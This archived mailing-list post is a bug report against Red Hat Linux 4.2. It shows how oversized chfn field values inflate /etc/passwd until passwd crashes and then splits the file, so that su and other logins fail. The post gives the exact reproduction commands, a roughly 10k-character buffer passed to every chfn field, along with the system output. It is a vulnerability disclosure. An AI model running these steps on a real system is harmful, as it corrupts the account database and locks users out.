I don't have the time to look into this much further, but it definitely looks scarey. I've tried it on 3 machines, and they all produce the same results. For what it's worth, all 3 machines were installed from the Redhat PowerTools 4.2 CD and have applied all relevant patches from ftp.redhat.com/pub/updates/4.2/i386/. Configuration Information --------------------------------------------- [alex@machine alex]$ cat /etc/redhat-release release 4.2 (Biltmore) rpm -qf /usr/bin/chfn util-linux-2.5-38 rpm -qf /usr/bin/passwd passwd-0.50-7 rpm -q pam pam-0.57-4 [alex@machine alex]$ cat /etc/pam.conf # # THIS FILE IS NOW OBSOLETE # # The contents of this file should be replaced by files in the # /etc/pam.d/ directory. # # [alex@machine alex]$ ls /etc/pam.d/ chfn ftp login passwd rlogin samba xdm chsh imap other rexec rsh su [alex@machine alex]$ cat /etc/pam.d/chfn #%PAM-1.0 auth required /lib/security/pam_pwdb.so shadow nullok account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so password required /lib/security/pam_pwdb.so shadow nullok use_authtok session required /lib/security/pam_pwdb.so [alex@machine alex]$ cat /etc/pam.d/passwd #%PAM-1.0 auth required /lib/security/pam_pwdb.so shadow nullok account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so password required /lib/security/pam_pwdb.so use_authtok nullok [alex@machine /tmp]$ tail /etc/passwd alex:x:500:500:alex,,,,:/home/alex:/bin/bash zane:x:501:501:zane,,,,:/home/zane:/bin/bash someone:x:502:502::/home/someone:/bin/bash [alex@machine /tmp]$ cat pass #this test has 11719 bytes of the sequence "0123456789", Xs work just as well. export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]' /bin/bash [alex@machine /tmp]$ ./pass [alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF Changing finger information for alex. Password: Finger information changed. [alex@machine /tmp]$ wc /etc/passwd 26 29 2068 /etc/passwd ** At this point, the passwd entry for 'alex' is >48k long ** [alex@machine alex]$ passwd Changing password for alex (current) UNIX password: New UNIX password: Segmentation fault ** LOGIN AS SECOND USER ** [zane@machine zane]$ passwd Changing password for zane (current) UNIX password: New UNIX password: Retype new UNIX password: passwd: all authentication tokens updated successfully ** 'passwd' just snipped our one big line into nice 8k chunks ** and created some junk passwd file entries. [zane@machine zane]$ wc /etc/passwd 31 34 47829 /etc/passwd [zane@machine zane]$ su someuser su: user someuser does not exist [zane@machine zane]$ su alex su: user alex does not exist [zane@machine zane]$ su zane su: user zane does not exist Other services I checked were equally screwed. (ftp, pop-3, etc...)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:00 PDT